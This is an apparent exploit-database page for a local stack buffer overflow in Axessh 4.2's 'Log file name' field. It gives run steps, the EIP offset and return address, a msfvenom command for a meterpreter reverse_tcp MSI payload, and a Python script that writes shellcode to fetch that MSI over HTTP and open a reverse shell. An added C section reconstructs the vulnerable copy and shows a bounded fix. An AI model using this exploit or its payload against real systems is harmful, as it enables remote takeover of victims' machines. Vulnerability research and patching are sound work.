Published on May 26th, 2019

Axessh 4.2 – ‘Log file name’ Local Stack-based Buffer Overflow



# Title: Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow
# Date: May 23rd, 2019
# Author: Uday Mittal (https://github.com/yaksas443/YaksasCSC-Lab/)
# Vendor Homepage: http://www.labf.com
# Software Link: http://www.labf.com/download/axessh.exe
# Version: v4.2
# Tested on: Windows 7 SP1 EN (x86)
# Reference: https://www.exploit-db.com/exploits/46858

# TO RUN:
# 0. Set up a multi/handler listener
# 1. Run python script
# 2. Copy contents of axssh.txt
# 3. Open telnet_S.exe
# 4. Select Details >> Settings >> Logging
# 5. Select Log all Session Output radio button
# 6. Paste the contents in Log file name
# 7. Press "OK"
# 8. Press "OK"

# EIP offset: 214
# 0x050e3f04 : push esp # ret  | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:\Windows\system32\ctl3d32.dll)


# 77da395c - Address of LoadLibraryA() for Windows 7 SP1 x86
# 777db16f - Address of system() for Windows 7 SP1 x86
# 77da214f - Address of ExitProcess for Windows 7 SP1 x86

# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281
# Payload command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi
# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.


filename = "axssh.txt"

msiScode = "x31xc0x66xb8x72x74x50x68x6dx73x76x63x54xbbx5cx39xdax77xffxd3x89xc5x31xc0x50x68x20x2fx71x6ex68x2ex6dx73x69x68x33x2fx6dx73x68x36x2ex31x36x68x38x2ex31x32x68x32x2ex31x36x68x2fx2fx31x39x68x74x74x70x3ax68x2fx69x20x68x68x78x65x63x20x68x6dx73x69x65x89xe7x57xb8x6fxb1x7dx77xffxd0x31xc0x50xb8x4fx21xdax77"

evilString = "x90" * 110 + msiScode + "x90" * 6 + "x04x3fx0ex05" + "x90"*4 + "x89xE0x83xE8x7Fx89xC4xEBx81" + "x90" * 800

file = open(filename,'w')
file.write(evilString)
file.close()
            





https://www.exploit-db.com/exploits/46922
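
The bug class behind this advisory, shown from the fixing side as an added example (not Axessh's code and not part of the original exploit): a settings handler that copies the 'Log file name' text into a fixed-size stack buffer, next to a bounded replacement. The function names, the 200-byte buffer size and the printable-ASCII policy are assumptions; the page gives only the 214-byte EIP offset.

```c
#include <stddef.h>
#include <string.h>

/* Assumed size: the page gives only the 214-byte EIP offset, not the real buffer. */
#define LOG_NAME_MAX 200

enum log_name_status { LOG_NAME_OK, LOG_NAME_EMPTY, LOG_NAME_TOO_LONG, LOG_NAME_BAD_CHAR };

/* Vulnerable pattern (hypothetical reconstruction): the dialog text is copied
 * into a stack buffer with no length check, so a name of LOG_NAME_MAX bytes
 * or more overwrites adjacent stack data, including the return address. */
void set_log_name_unsafe(const char *field_text)
{
    char name[LOG_NAME_MAX];
    strcpy(name, field_text);
    (void)name; /* the real handler would go on to open the log file */
}

/* Hardened form: the caller passes the destination size, the input is measured
 * without reading past that size, and oversized or non-printable names are
 * rejected instead of truncated. On any failure dst is left as "". */
enum log_name_status set_log_name(char *dst, size_t dst_size, const char *field_text)
{
    size_t len = 0, i;

    if (dst == NULL || dst_size == 0 || field_text == NULL)
        return LOG_NAME_EMPTY;
    dst[0] = '\0';

    while (len < dst_size && field_text[len] != '\0')
        len++;
    if (len == 0)
        return LOG_NAME_EMPTY;
    if (len >= dst_size)
        return LOG_NAME_TOO_LONG;

    /* Assumed policy: printable ASCII only (rejects control bytes and 0x80-0xFF). */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)field_text[i];
        if (c < 0x20 || c > 0x7e)
            return LOG_NAME_BAD_CHAR;
    }
    memcpy(dst, field_text, len + 1); /* len + 1 <= dst_size, includes the NUL */
    return LOG_NAME_OK;
}
```

Rejecting an oversized name outright, instead of truncating it, also keeps session output from being logged to a file the user did not name.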
